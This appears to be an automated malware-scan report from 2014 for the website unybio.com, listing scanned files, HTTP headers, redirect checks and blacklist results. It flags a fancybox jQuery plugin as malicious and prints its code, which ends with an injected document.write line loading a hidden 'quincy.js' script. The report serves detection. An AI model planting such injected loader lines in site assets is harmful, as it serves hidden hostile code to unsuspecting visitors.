Scanned pages/files
| Request | Server response | Status |
http://unybio.com/ | 200 OK Content-Length: 8989 Content-Type: text/html | clean |
http://unybio.com/bitrix/js/main/core/core.js?1394091397 | 200 OK Content-Length: 45436 Content-Type: application/x-javascript | clean |
http://unybio.com/bitrix/js/main/core/core_ajax.js?1394174680 | 200 OK Content-Length: 14097 Content-Type: application/x-javascript | clean |
http://unybio.com/bitrix/js/main/session.js?1394229629 | 200 OK Content-Length: 3157 Content-Type: application/x-javascript | clean |
http://api-maps.yandex.ru/1.1/index.xml?key=AII55k0BAAAAW8fEIQIAoH-JKLpqng9p5M9yXg0FT5yOe1IAAAAAAAAAAABfS4BC5BUmw4p94Os_zzokGCTrcw== | 200 OK Content-Length: 5480 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: text/javascript | clean |
http://unybio.com/public/js/jquery.cycle.all.min.js?1393598631 | 200 OK Content-Length: 32046 Content-Type: application/x-javascript | clean |
http://unybio.com/public/js/fancybox/jquery.fancybox-1.3.4.pack.js?1394185720 | 200 OK Content-Length: 15703 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.html('<p id easingOut:"swing",showCloseButton:true,showNavArrows:true,enableEscapeButton:true,enableKeyboardNav:true,onStart:function(){},onCancel:function(){},onComplete:function(){},onCleanup:function(){},onClosed:function(){},onError:function(){}};b(document).ready(function(){b.fancybox.init()})})(jQuery); document.write("<scr"+"ipt src='/public/js/fancybox/quincy.js'><"+"/script>"); Antivirus reports:
| ||
http://unybio.com/public/js/fancybox/jquery.mousewheel-3.0.4.pack.js?1394026588 | 200 OK Content-Length: 1279 Content-Type: application/x-javascript | clean |
http://unybio.com/public/js/ya.maps.js?1394154438 | 200 OK Content-Length: 1191 Content-Type: application/x-javascript | clean |
http://unybio.com/public/js/scripts.js?1394214044 | 200 OK Content-Length: 4509 Content-Type: application/x-javascript | clean |
http://unybio.com/about/activities/ | 200 OK Content-Length: 7153 Content-Type: text/html | clean |
http://unybio.com/about/management/ | 200 OK Content-Length: 6732 Content-Type: text/html | clean |
http://unybio.com/group-members/ | 200 OK Content-Length: 6744 Content-Type: text/html | clean |
http://unybio.com/clients_and_partners/partners/ | 200 OK Content-Length: 8244 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: unybio.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 18:36:26 GMT
Pragma: no-cache
Server: nginx/1.0.6
Content-Type: text/html; charset=Windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: PHPSESSID=bf4c4eaf5f0fe5141bd93d3bad096988; path=/; domain=unybio.com
X-Powered-By: PHP/5.2.10
X-Powered-CMS: Bitrix Site Manager (9d46a7b7327483f2ff6ee6a03a8f28e1)
GET / HTTP/1.1
Host: unybio.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 18:36:26 GMT
Pragma: no-cache
Server: nginx/1.0.6
Content-Type: text/html; charset=Windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: PHPSESSID=bf4c4eaf5f0fe5141bd93d3bad096988; path=/; domain=unybio.com
X-Powered-By: PHP/5.2.10
X-Powered-CMS: Bitrix Site Manager (9d46a7b7327483f2ff6ee6a03a8f28e1)
Second query (visit from search engine):
GET / HTTP/1.1
Host: unybio.com
Referer: http://www.google.com/search?q=unybio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: unybio.com
Referer: http://www.google.com/search?q=unybio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=unybio.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://unybio.com/
Result: unybio.com is not infected or malware details are not published yet.
Result: unybio.com is not infected or malware details are not published yet.